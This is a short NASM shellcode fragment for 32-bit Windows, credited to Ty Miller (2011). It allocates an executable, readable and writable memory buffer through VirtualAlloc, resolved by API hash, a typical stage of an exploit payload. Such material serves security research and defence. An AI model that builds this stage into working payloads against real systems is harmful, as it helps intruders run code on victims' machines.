21 lines
1.0 KiB
NASM
21 lines
1.0 KiB
NASM
;-----------------------------------------------------------------------------;
|
|
; Author: Ty Miller @ Threat Intelligence
|
|
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
|
|
; Version: 1.0 (2nd December 2011)
|
|
;-----------------------------------------------------------------------------;
|
|
[BITS 32]
|
|
|
|
; Input: None
|
|
; Output: EAX holds pointer to the start of buffer 0x1000 bytes, EBX holds value 0x1000
|
|
; Clobbers: EAX, EBX, ECX, EDX
|
|
|
|
mov ebx,0x1000 ; setup our flags and buffer size in ebx
|
|
allocate_memory: ; Alloc a buffer for the request and response data
|
|
push byte 0x40 ; PAGE_EXECUTE_READWRITE - don't need execute but may as well
|
|
push ebx ; MEM_COMMIT
|
|
push ebx ; size of memory to be allocated (4096 bytes)
|
|
push byte 0 ; NULL as we dont care where the allocation is
|
|
push 0xE553A458 ; hash( "kernel32.dll", "VirtualAlloc" )
|
|
call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
|
|
|